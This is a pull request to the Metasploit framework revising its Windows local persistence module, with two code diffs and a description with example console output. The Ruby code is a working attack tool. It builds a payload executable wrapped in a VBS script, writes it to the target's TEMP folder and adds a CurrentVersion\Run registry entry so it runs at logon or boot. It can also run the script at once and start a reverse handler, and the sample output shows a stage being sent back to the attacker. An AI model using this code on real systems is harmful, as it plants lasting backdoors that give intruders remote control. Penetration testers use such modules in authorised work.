### PR TITLE
persistence - more options, more verbose

### DIFF
--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -31,51 +31,50 @@ class Metasploit3 < Msf::Exploit::Local
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
-          'Carlos Perez <carlos_perez[at]darkoperator.com>'
+          'Carlos Perez <carlos_perez[at]darkoperator.com>',
+          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
       'DefaultTarget' => 0,
       'DisclosureDate'=> "Oct 19 2011",
-      'DefaultOptions' =>
+      'DefaultOptions'=>
         {
           'DisablePayloadHandler' => 'true',
         }
     ))
 
-    register_options(
-      [
-        OptInt.new('DELAY',
-          [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
-        OptEnum.new('STARTUP',
-          [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
-        OptString.new('VBS_NAME',
-          [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
-        OptString.new('EXE_NAME',
-          [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
-        OptString.new('REG_NAME',
-          [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
-        OptString.new('PATH',
-          [false, 'Path to write payload (%TEMP% by default).', nil]),
-      ], self.class)
+    register_options([
+      OptInt.new('DELAY',
+        [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
+      OptEnum.new('STARTUP',
+        [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+      OptString.new('VBS_NAME',
+        [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
+      OptString.new('EXE_NAME',
+        [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+      OptString.new('REG_NAME',
+        [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write payload (%TEMP% by default).', nil])
+    ], self.class)
 
     register_advanced_options([
       OptBool.new('HANDLER',
         [ false, 'Start an exploit/multi/handler job to receive the connection', false]),
       OptBool.new('EXEC_AFTER',
         [ false, 'Execute persistent script after installing.', false])
-      ], self.class)
+    ], self.class)
   end
 
   # Exploit method for when exploit command is issued
   def exploit
-    print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
-
     # Define default values
     rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     reg_val   = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    startup   = datastore['STARTUP'].downcase
     delay = datastore['DELAY'] || 10
     exc_after = datastore['EXEC_AFTER'] || false
     handler = datastore['HANDLER'] || false
@@ -87,13 +86,14 @@ class Metasploit3 < Msf::Exploit::Local
     # Connect to the session
     begin
       host, port = session.session_host, session.session_port
+      print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
     rescue => e
       print_error("Could not connect to session")
       return nil
     end
 
     # Check values
-    if (is_system?) && (datastore['STARTUP'] == 'USER')
+    if (is_system?) && (startup == 'user')
       print_warning('Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!')
     end
 
@@ -105,31 +105,30 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     # Generate the exe payload
-    print_status("Generating EXE payload (#{rexe_name})") if datastore['VERBOSE']
+    vprint_status("Generating EXE payload (#{rexe_name})")
     exe = generate_payload_exe
     # Generate the vbs payload
-    print_status("Generating VBS persistent script (#{rvbs_name})") if datastore['VERBOSE']
+    vprint_status("Generating VBS persistent script (#{rvbs_name})")
     vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
     # Writing the payload to target
-    print_status("Writing payload inside the VBS script on the target") if datastore['VERBOSE']
+    vprint_status("Writing payload inside the VBS script on the target")
     script_on_target = write_script_to_target(vbsscript, rvbs_name)
-
     # Exit the module because we failed to write the file on the target host
     # Feedback has already been given to the user, via the function.
     return unless script_on_target
 
     # Initial execution of persistent script
-    case datastore['STARTUP']
-    when 'USER'
+    case startup
+    when 'user'
       # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKCU", script_on_target, reg_val)
-      print_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on") if datastore['VERBOSE']
-    when 'SYSTEM'
+      vprint_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on")
+    when 'system'
       # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKLM", script_on_target, reg_val)
-      print_status("Payload will execute at the next SYSTEM startup") if datastore['VERBOSE']
+      vprint_status("Payload will execute at the next SYSTEM startup")
     else
-      print_error("Something went wrong. Invalid STARTUP method: #{datastore['STARTUP']}")
+      print_error("Something went wrong. Invalid STARTUP method: #{startup}")
       return nil
     end
 
@@ -147,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Local
     # Create 'clean up' resource file
     clean_rc = log_file()
     file_local_write(clean_rc, @clean_up_rc)
-    print_status("Clean up Meterpreter .RC file: #{clean_rc}")
+    print_status("Clean up Meterpreter RC file: #{clean_rc}")
 
     report_note(:host => host,
       :type => "host.persistance.cleanup",
@@ -183,6 +182,7 @@ class Metasploit3 < Msf::Exploit::Local
         print_good("Deleted #{filepath}")
       rescue
         print_error("Unable to delete file!")
+        return nil
       end
     end
 

--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -22,12 +22,11 @@ class Metasploit3 < Msf::Exploit::Local
 
   def initialize(info={})
     super( update_info( info,
-      'Name'          => 'Windows Manage Persistent Payload Installer',
+      'Name'          => 'Windows Persistent Registry Startup Payload Installer',
       'Description'   => %q{
-        This Module will create a boot persistent reverse Meterpreter session by
-        installing on the target host the payload as a script that will be executed
-        at user logon or system startup depending on privilege and selected startup
-        method.
+        This module will install a payload that is executed during boot.
+        It will be executed either at user logon or system startup via the registry
+        value in "CurrentVersion\Run" (depending on privilege and selected method).
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
@@ -38,50 +37,117 @@ class Metasploit3 < Msf::Exploit::Local
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
       'DefaultTarget' => 0,
-      'DisclosureDate'=> "Oct 19 2011"
+      'DisclosureDate'=> "Oct 19 2011",
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true',
+        }
     ))
 
     register_options(
       [
-        OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
-        OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
-        OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]),
-        OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']),
-        OptString.new('PATH',[false, 'Path to write payload']),
+        OptInt.new('DELAY',
+          [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
+        OptEnum.new('STARTUP',
+          [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+        OptString.new('VBS_NAME',
+          [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
+        OptString.new('EXE_NAME',
+          [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+        OptString.new('REG_NAME',
+          [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
+        OptString.new('PATH',
+          [false, 'Path to write payload (%TEMP% by default).', nil]),
+      ], self.class)
+
+    register_advanced_options([
+      OptBool.new('HANDLER',
+        [ false, 'Start an exploit/multi/handler job to receive the connection', false]),
+      OptBool.new('EXEC_AFTER',
+        [ false, 'Execute persistent script after installing.', false])
       ], self.class)
   end
 
-  # Exploit Method for when exploit command is issued
+  # Exploit method for when exploit command is issued
   def exploit
-    print_status("Running module against #{sysinfo['Computer']}")
+    print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
 
-    rexename = datastore['REXENAME']
-    delay = datastore['DELAY']
-    reg_val = datastore['REG_NAME']
+    # Define default values
+    rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    reg_val   = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    delay = datastore['DELAY'] || 10
+    exc_after = datastore['EXEC_AFTER'] || false
+    handler = datastore['HANDLER'] || false
     @clean_up_rc = ""
-    host,port = session.session_host, session.session_port
 
-    exe = generate_payload_exe
-    script = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay})
-    script_on_target = write_script_to_target(script, rexename)
+    rvbs_name = rvbs_name + '.vbs' if rvbs_name[-4,4] != '.vbs'
+    rexe_name = rexe_name + '.exe' if rexe_name[-4,4] != '.exe'
 
-    # exit the module because we failed to write the file on the target host.
-    return unless script_on_target
-
-    # Initial execution of script
-
-    case datastore['STARTUP']
-    when 'USER'
-      # if we could not write the entry in the registy we exit the module.
-      return unless write_to_reg("HKCU", script_on_target, reg_val)
-    when 'SYSTEM'
-      # if we could not write the entry in the registy we exit the module.
-      return unless write_to_reg("HKLM", script_on_target, reg_val)
+    # Connect to the session
+    begin
+      host, port = session.session_host, session.session_port
+    rescue => e
+      print_error("Could not connect to session")
+      return nil
     end
 
+    # Check values
+    if (is_system?) && (datastore['STARTUP'] == 'USER')
+      print_warning('Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!')
+    end
+
+    if (handler) && (!datastore['DisablePayloadHandler'])
+      # DisablePayloadHandler will stop listening after the script finishes - we want a job so it continues afterwards!
+      print_warning("Note: HANDLER == TRUE && DisablePayloadHandler == TRUE. This will create issues...")
+      print_warning("Disabling HANDLER...")
+      handler = false
+    end
+
+    # Generate the exe payload
+    print_status("Generating EXE payload (#{rexe_name})") if datastore['VERBOSE']
+    exe = generate_payload_exe
+    # Generate the vbs payload
+    print_status("Generating VBS persistent script (#{rvbs_name})") if datastore['VERBOSE']
+    vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
+    # Writing the payload to target
+    print_status("Writing payload inside the VBS script on the target") if datastore['VERBOSE']
+    script_on_target = write_script_to_target(vbsscript, rvbs_name)
+
+    # Exit the module because we failed to write the file on the target host
+    # Feedback has already been given to the user, via the function.
+    return unless script_on_target
+
+    # Initial execution of persistent script
+    case datastore['STARTUP']
+    when 'USER'
+      # If we could not write the entry in the registy we exit the module.
+      return unless write_to_reg("HKCU", script_on_target, reg_val)
+      print_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on") if datastore['VERBOSE']
+    when 'SYSTEM'
+      # If we could not write the entry in the registy we exit the module.
+      return unless write_to_reg("HKLM", script_on_target, reg_val)
+      print_status("Payload will execute at the next SYSTEM startup") if datastore['VERBOSE']
+    else
+      print_error("Something went wrong. Invalid STARTUP method: #{datastore['STARTUP']}")
+      return nil
+    end
+
+    # Do we setup a exploit/multi/handler job?
+    if handler
+      listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])
+      if listener_job_id.blank?
+        print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
+      end
+    end
+
+    # Do we execute the VBS script afterwards?
+    target_exec(script_on_target) if datastore['EXEC_AFTER']
+
+    # Create 'clean up' resource file
     clean_rc = log_file()
     file_local_write(clean_rc, @clean_up_rc)
-    print_status("Cleanup Meterpreter RC File: #{clean_rc}")
+    print_status("Clean up Meterpreter .RC file: #{clean_rc}")
 
     report_note(:host => host,
       :type => "host.persistance.cleanup",
@@ -98,9 +164,144 @@ class Metasploit3 < Msf::Exploit::Local
     )
   end
 
+  # Writes script to target host and returns the pathname of the target file or nil if the
+  # file could not be written.
+  def write_script_to_target(vbs, name)
+    filename = name || Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
+    temppath = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    filepath = temppath + "\\" + filename
+
+    if !directory? temppath
+      print_error("#{temppath} does not exists on the target")
+      return nil
+    end
+
+    if file? filepath
+      print_warning("#{filepath} already exists on the target. Deleting...")
+      begin
+        file_rm(filepath)
+        print_good("Deleted #{filepath}")
+      rescue
+        print_error("Unable to delete file!")
+      end
+    end
+
+    begin
+      write_file(filepath, vbs)
+      print_good("Persistent VBS script written on #{sysinfo['Computer']} to #{filepath}")
+
+      # Escape windows pathname separators.
+      @clean_up_rc << "rm #{filepath.gsub(/\\/, '//')}\n"
+    rescue
+      print_error("Could not write the payload on the target")
+      # Return nil since we could not write the file on the target
+      filepath = nil
+    end
+
+    return filepath
+  end
+
+  # Installs payload in to the registry HKLM or HKCU
+  def write_to_reg(key, script_on_target, registry_value)
+    regsuccess = true
+    nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)
+    key_path = "#{key.to_s}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+
+    print_status("Installing as #{key_path}\\#{nam}")
+
+    if key && registry_setvaldata(key_path, nam, script_on_target, "REG_SZ")
+      print_good("Installed autorun on #{sysinfo['Computer']} as #{key_path}\\#{nam}")
+    else
+      print_error("Failed to make entry in the registry for persistence")
+      regsuccess = false
+    end
+
+    return regsuccess
+  end
+
+
+  # Executes script on target and returns true if it was successfully started
+  def target_exec(script_on_target)
+    execsuccess = true
+    print_status("Executing script #{script_on_target}")
+    # Lets give the target a few seconds to catch up...
+    sleep(3)
+
+    # Error handling for process.execute() can throw a RequestError in send_request.
+    begin
+      unless datastore['EXE::Custom']
+        session.shell_command_token(script_on_target)
+      else
+        session.shell_command_token("cscript \"#{script_on_target}\"")
+      end
+    rescue
+      print_error("Failed to execute payload on target")
+      execsuccess = false
+    end
+
+    return execsuccess
+  end
+
+  # Starts a exploit/multi/handler session
+  def create_multihandler(lhost, lport, payload_name)
+    pay = client.framework.payloads.create(payload_name)
+    pay.datastore['LHOST'] = lhost
+    pay.datastore['LPORT'] = lport
+    print_status('Starting exploit/multi/handler')
+    if !check_for_listener(lhost, lport)
+      # Set options for module
+      mh = client.framework.exploits.create('multi/handler')
+      mh.share_datastore(pay.datastore)
+      mh.datastore['WORKSPACE'] = client.workspace
+      mh.datastore['PAYLOAD'] = payload_name
+      mh.datastore['EXITFUNC'] = 'thread'
+      mh.datastore['ExitOnSession'] = true
+      # Validate module options
+      mh.options.validate(mh.datastore)
+      # Execute showing output
+      mh.exploit_simple(
+          'Payload'     => mh.datastore['PAYLOAD'],
+          'LocalInput'  => self.user_input,
+          'LocalOutput' => self.user_output,
+          'RunAsJob'    => true
+        )
+
+      # Check to make sure that the handler is actually valid
+      # If another process has the port open, then the handler will fail
+      # but it takes a few seconds to do so.  The module needs to give
+      # the handler time to fail or the resulting connections from the
+      # target could end up on on a different handler with the wrong payload
+      # or dropped entirely.
+      select(nil, nil, nil, 5)
+      return nil if framework.jobs[mh.job_id.to_s].nil?
+
+      return mh.job_id.to_s
+    else
+      print_error('A job is listening on the same local port')
+      return nil
+    end
+  end
+
+  # Method for checking if a listener for a given IP and port is present
+  # will return true if a conflict exists and false if none is found
+  def check_for_listener(lhost, lport)
+    client.framework.jobs.each do |k, j|
+      if j.name =~ / multi\/handler/
+        current_id = j.jid
+        current_lhost = j.ctx[0].datastore['LHOST']
+        current_lport = j.ctx[0].datastore['LPORT']
+        if lhost == current_lhost && lport == current_lport.to_i
+          print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
+          return true
+        end
+      end
+    end
+    return false
+  end
+
   # Function for creating log folder and returning log path
   def log_file(log_path = nil)
-    #Get hostname
+    # Get hostname
     host = session.sys.config.sysinfo["Computer"]
 
     # Create Filename info to be appended to downloaded files
@@ -118,66 +319,9 @@ class Metasploit3 < Msf::Exploit::Local
     # Create the log directory
     ::FileUtils.mkdir_p(logs)
 
-    #logfile name
+    # logfile name
     logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
     return logfile
-  end
-
-  # Writes script to target host and returns the pathname of the target file or nil if the
-  # file could not be written.
-  def write_script_to_target(vbs, name)
-    tempdir = datastore['PATH'] || session.sys.config.getenv('TEMP')
-    unless name
-      tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
-    else
-      tempvbs = tempdir + "\\" + name + ".vbs"
-    end
-    begin
-      write_file(tempvbs, vbs)
-      print_good("Persistent Script written to #{tempvbs}")
-      # Escape windows pathname separators.
-      @clean_up_rc << "rm #{tempvbs.gsub(/\\/, '//')}\n"
-    rescue
-      print_error("Could not write the payload on the target hosts.")
-      # return nil since we could not write the file on the target host.
-      tempvbs = nil
-    end
-    return tempvbs
-  end
-
-  # Executes script on target and returns true if it was successfully started
-  def target_exec(script_on_target)
-    execsuccess = true
-    print_status("Executing script #{script_on_target}")
-    # error handling for process.execute() can throw a RequestError in send_request.
-    begin
-      unless datastore['EXE::Custom']
-        session.shell_command_token(script_on_target)
-      else
-        session.shell_command_token("cscript \"#{script_on_target}\"")
-      end
-    rescue
-      print_error("Failed to execute payload on target host.")
-      execsuccess = false
-    end
-    return execsuccess
-  end
-
-  # Installs payload in to the registry HKLM or HKCU
-  def write_to_reg(key, script_on_target, registry_value)
-    nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)
-    key_path = "#{key.to_s}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
-
-    print_status("Installing into autorun as #{key_path}\\#{nam}")
-
-    if key && registry_setvaldata(key_path, nam, script_on_target, "REG_SZ")
-      print_good("Installed into autorun as #{key_path}\\#{nam}")
-      return true
-    else
-      print_error("Failed to make entry in the registry for persistence.")
-    end
-
-    false
   end
 
 end


### PR DESCRIPTION
...and less bugs!
- Able to define the EXE payload filename (Thanks to #5550. Was just `vbs_name` before).
- Able to setup a exploit/multi/handler job (So its able to continue on after the script has finished. `DisablePayloadHandler` would stop after script finishes) .
- Able to execute persistence script after installing (so dont have to wait for reboot).
- Performs various checks (should be more stable now).
- Will display various warnings if you're doing something 'different'/stupid.
- Added various verbose messages during the process.

Related (closed) pull request #2051.
## Example Output

```
msf exploit(persistence) > run

[*] Running persistent module against TARGET via session ID: 1
[*] Generating EXE payload (evil_exe.exe)
[*] Generating VBS persistent script (evil_vbs.vbs)
[*] Writing payload inside the VBS script on the target
[+] Persistent VBS script written on TARGET to C:\folder1\evil_vbs.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\evil_reg
[+] Installed autorun on TARGET as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\evil_reg
[*] Payload will execute when USER (TARGET\Administrator) next logs on
[*] Starting exploit/multi/handler
[*] Started reverse handler on 192.168.1.2:443 
[*] Starting the payload handler...
[*] Executing script C:\folder1\evil_vbs.vbs
[*] Sending stage (882688 bytes) to 192.168.1.21
[*] Clean up .RC file: /root/.msf4/logs/persistence/TARGET_20150617.5047/TARGET_20150617.5047.rc
msf exploit(persistence) >
```
